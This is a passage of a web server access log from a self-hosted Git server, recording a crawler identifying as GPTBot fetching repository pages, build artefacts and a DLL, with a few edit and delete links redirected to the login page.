"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14718] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14714] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 6802] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" -[17/Feb/2026:16:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 11064] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:16:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21631] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:55:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21683] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21645] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21680] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21683] [Gzip 28.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 